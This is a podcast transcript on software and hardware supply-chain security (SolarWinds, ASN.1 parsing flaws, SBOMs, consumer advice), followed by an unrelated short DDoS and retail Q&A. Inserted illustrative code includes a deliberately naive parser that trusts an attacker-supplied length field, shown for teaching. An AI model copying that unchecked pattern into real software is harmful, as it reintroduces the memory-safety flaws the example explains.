Gaus Rajnovic: Oh, well, yes. I mean, nowadays, especially in IT, hardware is often just software in disguise, because if possible you would like to have a chip that you can use for multiple purposes. So basically you have hardware that you then program, and you change the function as needed. But if we move a little bit away from that and look generally at hardware, and at chips in particular, vulnerabilities in them are a longstanding concern, especially for Western governments. What is happening is that they obviously need to procure products for their environment, and that environment sometimes tends to rely on relatively old chips, which are not produced by, let's say, Western vendors anymore. So they need to procure them from elsewhere. Now you have a question: do we really trust that those chips do not contain any undocumented and unwanted functionalities?
So you have a whole science of testing and verifying that what you are getting is actually what you asked for and that there is nothing else in it. And it is hard.
Ali Wyne: So Charles, let me come back to you. Software supply chains are being targeted, and hardware supply chains are being targeted. Obviously, as listeners, all of us, regardless of our position or the kinds of devices we have, want to take steps to enhance the security of our devices. But I've got to be candid with you: when I think about how many times in a given day my phone asks me to install certain updates, and my laptop asks me to install certain updates, my instinct is to install them because I want to enhance the security of my devices, but it's pretty overwhelming to think about whether we can actually trust all of these updates we're being asked to install. Isn't it?
Charles Carmakal: It absolutely is. And a funny argument that was made during the SolarWinds supply chain days was that the organizations that weren't impacted were the ones that were really late to apply the patch. Some of them joked that they just had such bad patch management processes that they didn't have to deal with the cybersecurity implications of the attack.
Ali Wyne: Yeah.
Charles Carmakal: As an average person though, it is impossible for us to really consider all the variety of cybersecurity attacks that are out there. And in general, the right practice is to have some level of trust of the vendors of the software that you use, assuming that you're using legitimate commercial software or open source software, and it's to apply the patches that are made available because the vast majority of the time, the patches will actually increase the overall security posture of your system, of your device, of whatever it is that you're installing the patch on.
It's the edge cases where attackers get access to software supply chains and are able to modify legitimate code and insert malicious code there. It happens. I could list off a few dozen examples where it's happened in the past, but for all the times that it's happened in the past, I mean, that's representative of less than 0.001% of all the software updates and the patching that goes on out there. So I think in general, as an average, everyday person, patching is good, patching provides additional security capability and benefits. And when there are situations where patches are actually malicious, usually the community figures that out and they share that information broadly and people take corrective action.
Ali Wyne: No, that's helpful. That's helpful to know. Gaus, I want to come back to you, and I want to make a bit of an analogy between some of the supply chain vulnerabilities that we've been discussing and some of the vulnerabilities that we've seen in the time of COVID, and ask you to reflect a little bit on that comparison. Specifically, we know that supply chain issues earlier in the product life cycle, say in raw materials, for example, can have a much greater impact later on, when products get closer to consumers.
And we saw something kind of similar to this in global supply chain issues we faced, and that we continue to face during the coronavirus pandemic. So for example, if the raw materials were delayed a week due to labor shortages, that might mean that the next step of production was delayed two weeks or the next step four weeks, and so on. Do you think that it's valid to apply kind of a similar model to ICT supply chain attacks? And that is to say, the earlier in the process we see a vulnerability, the worse and broader the negative result and impact might be later on?
Gaus Rajnovic: Unfortunately, the answer is yes. There is also an additional complication, because the earlier in the chain you get, the more basic the components are, and those really basic components tend not to be so sexy, so people don't pay that much attention to them. They just say, "Yeah, yeah, fine. I mean, that was working for the last 20, 30 years. Why should I look at it? Just take it and run." And I have one great example of that. There is something called Abstract Syntax Notation One, or ASN.1 for short. It is used everywhere. Not many people have heard of it, but it is a way to format data before you send it over the network to another peer. Approximately 20-odd years ago, there was a vulnerability in an ASN.1 library, in the way that data format was unpacked and processed. It was a very bad vulnerability.
You were able to achieve remote code execution on many, many devices just by sending a packet: the vulnerability would be triggered the moment the device started processing the packet, way before any other logic kicked in. So it was really basic stuff. If you go and look for those old advisories, you will still find them; just look at the number of vendors that were affected by that vulnerability, it is staggering. Also look at which protocols were implicated, meaning they used, and still use, ASN.1 notation. It is absolutely unbelievable. But the worst thing is that we are now almost 20 years after that incident, and I am not sure all vendors have patched it, because there are still plenty of old vulnerable libraries lying around, and some small vendors just take them and run, and nobody looks at them because, "Hey, it was working for the last 20, 30 years. Why bother? It works." So unfortunately, yes, the earlier you get into the supply chain, the more damage you can do.
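The ASN.1 flaws Gaus recalls were parsing bugs: code trusted length fields in attacker-controlled packets before any application logic ran. A toy type-length-value parser in Python, showing the naive habit and the missing check; real ASN.1 encoding is considerably more involved:

```python
def parse_tlv_naive(packet: bytes) -> tuple[int, bytes]:
    # Trusts the attacker-supplied length byte. In a memory-unsafe
    # language, the same habit reads or writes out of bounds the moment
    # the packet is processed, before any higher-level logic runs.
    tag, length = packet[0], packet[1]
    return tag, packet[2:2 + length]

def parse_tlv_checked(packet: bytes) -> tuple[int, bytes]:
    if len(packet) < 2:
        raise ValueError("packet too short")
    tag, length = packet[0], packet[1]
    if len(packet) - 2 < length:
        raise ValueError("declared length exceeds received bytes")
    return tag, packet[2:2 + length]

print(parse_tlv_checked(bytes([0x04, 0x03, 0x61, 0x62, 0x63])))  # (4, b'abc')
```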
Ali Wyne: That's sobering, and it's sobering to think that even 20 or 30 years on, we still have some of these initial vulnerabilities that companies haven't adequately addressed. Charles, you talked about SolarWinds affecting 18,000, or I should say targeting 18,000 organizations, but as you mentioned, the attacks themselves were only actually executed against a handful of government organizations. So let's say that I'm a business owner who didn't have my systems disrupted. Can you help the listeners understand what might be going on? Why might it be the case that I, as a business owner, didn't have my systems disrupted by the SolarWinds attack?
Charles Carmakal: Yeah. And just to clarify, so the threat actor leveraged the SolarWinds backdoor to get access to both government and commercial entities.
Ali Wyne: Right.
Charles Carmakal: So there were a number of technology companies and a variety of other companies that weren't government entities that were targeted. As you think about the victimology, a lot of those companies were pretty large organizations with very large customer bases that potentially could have been the next SolarWinds. And in fact, we may not be calling it the SolarWinds attack if it hadn't been detected when it was. What I mean by that is that the threat actor, I believe, was surprised that they got caught when they did. I think they were surprised when we outed them. They probably thought they had months or years to continue doing what they were doing. They were doing things in a clandestine, quiet manner, and they were doing it relatively slowly because they didn't want to get caught. They wanted to keep stealing information that was of strategic interest to the Russian government.
Ali Wyne: Sure.
Charles Carmakal: And I think that they were interested in continuing to create other supply chain attacks. When you look at some of the companies that they broke into, I mean, they broke into security companies, they broke into technology companies. I do think that in a way we're all lucky that it was detected when it was, because I think we very likely stopped what could have been the SolarWinds attack, plus the technology company X's attack, plus the technology company Y's attack that a lot of people would've probably talked about.
For companies outside of the big companies that were targeted, just think about any other company out there: look, most organizations aren't of interest to the Russian government. When Russia conducts offensive operations, it does so for a reason. Sometimes there is a political reason. Sometimes it's for national defense purposes. Sometimes it's because they're embarrassed by something. And so you think back to 2016, and no, I'm not going to give the example of the US presidential elections, because everybody talks about that; I'm going to give a different example: the attacks against anti-doping agencies. A number of them were hacked. Essentially what happened was that Russian athletes were accused of doping, and it was made known that the Russian government was aware of the performance-enhancing drugs that Russian athletes were using.
And so the Russian government wanted to prove that the rest of the world uses performance-enhancing drugs and dopes too, so they hacked into a number of the anti-doping agencies and ended up publishing a lot of information about athletes that had failed tests before certain sporting events. That is an example of one of the reasons why the Russian government may conduct intrusion operations; there's usually a specific reason. Today, as we think about the invasion of Ukraine, I think it's interesting that we haven't seen destructive attacks against the Western world yet. Leading up to the Ukrainian invasion, we definitely saw a number of intrusions against ministries of foreign affairs in a variety of countries by Russian threat actors to steal information, again, of strategic interest to the government.
We definitely saw very destructive and disruptive attacks against organizations in Ukraine leading up to the invasion and then coinciding with the invasion. But we haven't seen those attacks against other Western organizations. I think the anticipation and the fear is that the Russian government tends to go tit for tat. They will very likely target, in other parts of the world, the sectors that were most impacted in Russia. So when you think about the sanctions against Russian entities, there's a very good chance, or at least the belief is, that the Russian government will conduct some kind of cyber operation against the US financial services sector. There's fear and anticipation that the Russian government will target energy sector organizations. There's also fear that Russia will look at which companies are publicly aligning with Ukraine and very vocally standing up against Russia; those are very likely going to be targets of Russian espionage and destructive operations.
Ali Wyne: This actually goes to the name of this podcast series, Patching the System. Gaus, I want to come back to you. Obviously, prevention is better than patching things up after an attack, and supply chains are getting more and more complex and complicated; the vast majority of everything comes from somewhere else. What can companies realistically do to protect themselves?
Gaus Rajnovic: Well, trust, but verify. I would like to split this answer in two. One part is from the perspective of an organization as a consumer of technology. Obviously you cannot go and, I don't know, disassemble and analyze each and every line of a patch that you receive, and do that constantly for each and every device; it is just out of the question. But what you can do is monitor what is going on in your environment. That should be part of your normal security operations center or CERT or whatever other security function you have, or should have, internally. So you can trust that what you receive is legitimate and that everything should be fine, but you still need to go and verify that what you are seeing inside your system matches what you would expect to see.
And Charles said it at the beginning: they discovered the attack because they spotted an anomaly. The other part of my answer is when I look at this question through my vendor's eyes: what can I do as a vendor to make sure that what I'm receiving is legitimate and what I'm expecting, so that what I pass along the supply chain also does not contain any defects or vulnerabilities or anything else? And again, the same principle, trust but verify, applies to all my suppliers. You can start with some really basic things. For example, I would like to have a contact at each of my suppliers who handles product security vulnerabilities, meaning that if I find something in that component, I know who to call. Another very basic thing is a software bill of materials, or a bill of materials in general: I would like to know what is inside the component that I am receiving.
I would also like to know what tests my supplier has done on that component and what the results are. And then I would repeat the testing myself just to make sure that everything matches. Those are some very basic things, but they help a lot. And I am sometimes ashamed to say that even with all this advancement, the industry today still has vendors, and I'm not talking about really small vendors, I'm talking about midsize vendors, where there is nobody to call when we find a vulnerability in their product and need it fixed.
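[Editor's note: To make the bill-of-materials point concrete, here is a minimal sketch of consuming a software bill of materials (SBOM). It assumes a CycloneDX-style JSON file; the file name "component.sbom.json" is a hypothetical placeholder.]

```python
# Minimal sketch of consuming an SBOM: read a CycloneDX-style JSON file
# and list each component so it can be cross-checked against supplier
# contacts and supplier test results.
import json

def list_components(sbom_path: str) -> list[tuple[str, str]]:
    """Return (name, version) pairs for every component in the SBOM."""
    with open(sbom_path, encoding="utf-8") as f:
        sbom = json.load(f)
    return [
        (c.get("name", "<unnamed>"), c.get("version", "<unknown>"))
        for c in sbom.get("components", [])
    ]

if __name__ == "__main__":
    for name, version in list_components("component.sbom.json"):
        # e.g., match each entry to a supplier security contact and test report
        print(f"{name} {version}")
```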
Ali Wyne: Charles, you heard what Gaus just said. What are some of the ways in which software and hardware manufacturers can come together to help build trust and verify? How should they coordinate their efforts and keep their lines of communication open, especially since hardware increasingly needs constant updates to software?
Charles Carmakal: Yeah, absolutely. I definitely agree with Gaus on trust but verify. And I think there's a certain amount of trust that organizations have to place in their vendors that they're doing the right things, and I think most people want to do the right things. It sometimes becomes cost-prohibitive to do so, so it doesn't always happen. I think having more transparency about the security issues that people identify, and doing timely fixes, is really important. And I'll tell you, it's definitely frustrating for security researchers who identify vulnerabilities in particular products: they notify the vendors and never get an acknowledgement that the vendor heard there's a vulnerability. Or sometimes the vendor will say, "There isn't a vulnerability." Sometimes they'll say, "There is a vulnerability, but we'll get around to fixing it whenever we get around to fixing it."
And so responses like that can be really demoralizing for security researchers. Being as transparent as you can, trying to be timely with fixes, sharing information, and collaborating as a community are really important to addressing this problem.
Look, I'll tell you, things have dramatically changed for the better in terms of the collaboration between vendors and the security community. Twenty years ago, we all used to laugh at Microsoft and say that they had arguably a terrible cybersecurity program. But when I look for one of the best case studies of an organization that has dramatically changed people's perceptions of it, and of just how much time, effort, and care it puts into security, Microsoft is one of the best examples.
Ali Wyne: So as both of you know, in an earlier podcast episode, I spoke to Annalaura Gallo. She's the head of the secretariat of the Cybersecurity Tech Accord. Here's what she had to say about new approaches to combating ICT threats.
Annalaura Gallo: So we've been engaging with the UN in the context of the dialogues on responsible state behavior in cyberspace, and we will continue to do so. And we have been encouraging states in particular to introduce a new norm that clearly declares cyberattacks against the ICT supply chain out of bounds. But our signatories have also been calling for a shift in the way governments and businesses defend against these types of attacks, because taking a purely defensive approach is no longer enough. Organizations should start to think like the attackers.
Ali Wyne: So Gaus, why don't we start with you? What is your reaction to Annalaura's assessment?
Gaus Rajnovic: I agree with the assessment. Yes, we need to change things, because obviously the way they are at the moment is not an ideal situation, and we would like to improve it. Having said that, there are multiple points. The first point, for example, is somehow putting the supply chain out of bounds, so that you should not attack the supply chain. It is an admirable goal. Personally, I am skeptical that it will ever be achieved, just because the supply chain is so big. I mean, when you look at a single product, how many components come in, and from where, and through how many hands that product passes, it is really hard to say, "Okay, we will just declare everything that relates to the supply chain out of bounds. We will not attack it. We will not mess with it, but we will go after everything else."
And please bear in mind that there are also initiatives, for example, to put national infrastructure that civilians need to live out of bounds as well, and things like that. I'm afraid that in the flux of war, it doesn't work that way. So: admirable, but I'm skeptical. If I may just quickly?
Ali Wyne: Sure.
Gaus Rajnovic: There is another point, about not being only defensive. Yes, I have heard those ideas multiple times, suggesting that we should also go on the offensive in a sense, or at least have an active defense. Again, personally, I'm not in favor of active defense because, in my mind, imagine two gunslingers in the old Wild West. They would come to the street, everybody would move aside, they would have a shootout, and then pack their things and go away, to continue the duel some other time.
But what will happen after that duel is that there will be lots of bullets in the walls and broken windows, and somebody will have to go and fix that. Now apply this metaphor to cyberspace. Yes, you will have bad guys and good guys, and they will go at each other, but throughout that battle there will be lots of broken stuff that somebody will have to fix later. And unfortunately, some of the stuff that gets broken during the conflict is stuff that people's lives depend on. That is the reason why I'm not overly fond of active defense.
Charles Carmakal: Look, I think there are general rules of engagement that certain countries operate by. For example, when you look at the Chinese government, they typically conduct operations for political or military purposes. They used to also conduct offensive operations for economic purposes, but there was an agreement between President Obama and President Xi where neither side acknowledged hacking into companies in the other's country, but they said that in the future they wouldn't do it for economic espionage. So I think rules of engagement are really important. They help establish where the line is, when it gets crossed, and which events would be considered crossing the line and a potential escalation. And that's something that we're all thinking about right now. If what happened in Ukraine a few years ago with NotPetya happened in the United States, I'd be afraid to see what the United States might do in retaliation.
And so we're all trying to figure out, and I think Russia and many governments are very mindful of, at what point a cyber operation crosses the line and forces the victim, or maybe a collection of countries, to retaliate in a very escalatory way. And then at what point does the retaliation include kinetic consequences? For example, when we look at the Colonial Pipeline incident from last year, our assessment is that the Colonial Pipeline intrusion was done for financially motivated purposes by organized criminals. We don't believe that Putin directed it, or at least we have no evidence that Putin had knowledge of it or directed it. But it would be a very different thing if there were evidence of Putin directly ordering the intrusion of Colonial Pipeline, which had an impact on the supply chain of gas getting to airplanes and vehicles.
And so, again, I think we're all thinking about escalation. So it is good to have rules of engagement, but the downside of having rules of engagement is that anything you don't expressly prohibit can look permitted. Is everything else okay to do? So if you say-
Ali Wyne: Right.
Charles Carmakal: "Protect the supply chain," or, "You can't attack healthcare," is it then fair game to hack into financial services companies, into manufacturing companies, and schools, right? So that's the counterpoint. So it's hard to tell, but I think the rules of engagement, generally speaking, are good.
Ali Wyne: I would guess that most of the folks who are tuning in to today's podcast don't have your expertise, either on the hardware side or on the software side. Most of the listeners, I would guess, are lay consumers. So for us lay consumers, what can we do to enhance the security of our devices and mitigate some of the issues that we've talked about today?
Charles Carmakal: Yep. There are three things, and these are three very important things that are, unfortunately, somewhat hard to do. The first is that we strongly encourage everybody to use a password manager and have a unique, different password for every single website you use. The reason is that when a threat actor hacks into a particular website or company, one thing they do is download all the usernames and passwords of everyone who uses that resource, and then they attempt to use those usernames and passwords on other websites: email accounts, bank accounts, social media accounts. That is a very prominent way threat actors break into organizations and accounts and steal data from people. Number two, use multifactor authentication. That's where you provide a username, a password, and then some secondary form of authentication.
Sometimes it's a code that gets texted to your phone, sometimes it's an email with a code, or maybe an app on your phone that gives you a randomly generated number. That helps mitigate the risk of somebody getting access to your account. And the third thing is to apply software patches when your device tells you to, but be cautious and careful. You don't want to get tricked into clicking a link on a website that tells you to apply a patch but is actually malicious. Get comfortable and familiar with where your computer or device legitimately tells you to apply an update, do it when asked, and be mindful that there are scammers and threat actors who will attempt to trick people into applying patches that aren't real and are actually malicious.
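[Editor's note: To illustrate the "unique password per site" advice, here is a minimal sketch using Python's standard secrets module. In practice a password manager generates and stores these for you; the site names are hypothetical examples.]

```python
# Minimal sketch of generating a strong, distinct password per site.
# A password manager does this (plus secure storage) automatically.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_password(length: int = 20) -> str:
    """Return a cryptographically random password of the given length."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

if __name__ == "__main__":
    # One distinct password per site, so a breach of one site's database
    # cannot be replayed against the others (credential stuffing).
    for site in ("example-bank.com", "example-mail.com", "example-shop.com"):
        print(site, generate_password())
```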
Gaus Rajnovic: I totally agree with what Charles said; those are the things a consumer can do. Looking at it from the perspective of somebody who makes those products: they need to be as easy to use as possible, and unfortunately that also limits what actions users can take. At the other end, if I make a product that everybody needs to tweak for, I don't know, two hours before they use it, I will not sell that product at all, because people want functionality and they want stuff to work as is. So password management: absolutely a must, do it. There is one thing that, at least on the producing side, we see coming: something called security labels. Several governments around the world are toying with that idea. Basically, you have a label on a product that tells you, more or less, how secure the product is. It is not finalized yet.
There are pilot schemes going on in Finland and Singapore. Most likely it is something that will come to the market in the next, I don't know, three to five years or thereabouts. So that is something consumers will later be able to look for, to see whether one product is more secure than an alternative, and then base their purchasing decision on that label. But we are not there yet.
Ali Wyne: Charles Carmakal, senior vice president and chief technology officer at Mandiant, Gaus Rajnovic, cybersecurity manager at Panasonic Europe, thank you both so much for being here.
Charles Carmakal: Absolutely.
Gaus Rajnovic: The pleasure was mine.
Ali Wyne: Well, that's it for this episode of Patching the System. Tune in next time for more on the future of cyber threats and what we can do about them. You can catch this podcast as a special drop in Ian Bremmer's GZERO World feed, anywhere you get your podcasts. I'm Ali Wyne. Thanks very much for listening.
Preventing a DDoS attack; brick and mortars no more
Nicholas Thompson, editor-in-chief of WIRED, discusses technology industry news today:
What is a DDoS attack and how can they be prevented?
That's a distributed denial of service attack. Somebody uses malware to infect a bunch of computers or Internet of Things devices and sends lots of traffic at a server, trying to knock the server offline. What can you do if you own the server? Buy more capacity, become part of a large operation like AWS that can offer you expanded capacity during an attack, and build good filtering and blocking software.
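[Editor's note: As a minimal sketch of one "filtering and blocking" building block, here is a per-client token-bucket rate limiter. Real DDoS mitigation happens at the network edge, via scrubbing services and CDNs, but the core idea of capping request rates per source looks roughly like this; the rates and client address are illustrative.]

```python
# Minimal sketch of a per-client token-bucket rate limiter: each client
# gets a bucket that refills at a fixed rate; requests beyond the
# allowed burst are dropped or throttled.
import time
from collections import defaultdict

RATE = 5.0    # tokens refilled per second per client
BURST = 10.0  # maximum bucket size (allowed burst)

# client_id -> (tokens remaining, timestamp of last update)
buckets = defaultdict(lambda: (BURST, time.monotonic()))

def allow_request(client_id: str) -> bool:
    """Return True if the client still has tokens; False means drop."""
    tokens, last = buckets[client_id]
    now = time.monotonic()
    tokens = min(BURST, tokens + (now - last) * RATE)  # refill since last seen
    if tokens >= 1.0:
        buckets[client_id] = (tokens - 1.0, now)
        return True
    buckets[client_id] = (tokens, now)
    return False

if __name__ == "__main__":
    # A client hammering the server exhausts its burst and gets dropped.
    allowed = sum(allow_request("203.0.113.7") for _ in range(100))
    print(f"allowed {allowed} of 100 rapid requests")
```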
Because of COVID-19 and the continued expansion of e-commerce, which brick-and-mortar businesses will go away?
A lot, unfortunately. We're all learning how to buy things online. Companies are learning how to ship things online. And we're not going to want to be in contact with people even when the world starts to reopen. So, any business that was in trouble before this will be in even more trouble after this.
Which next gen console are you more excited for, the Microsoft mini fridge or the Sony Wi-Fi router?
I'm just excited to argue with my kids about whether they get a PlayStation or an Xbox.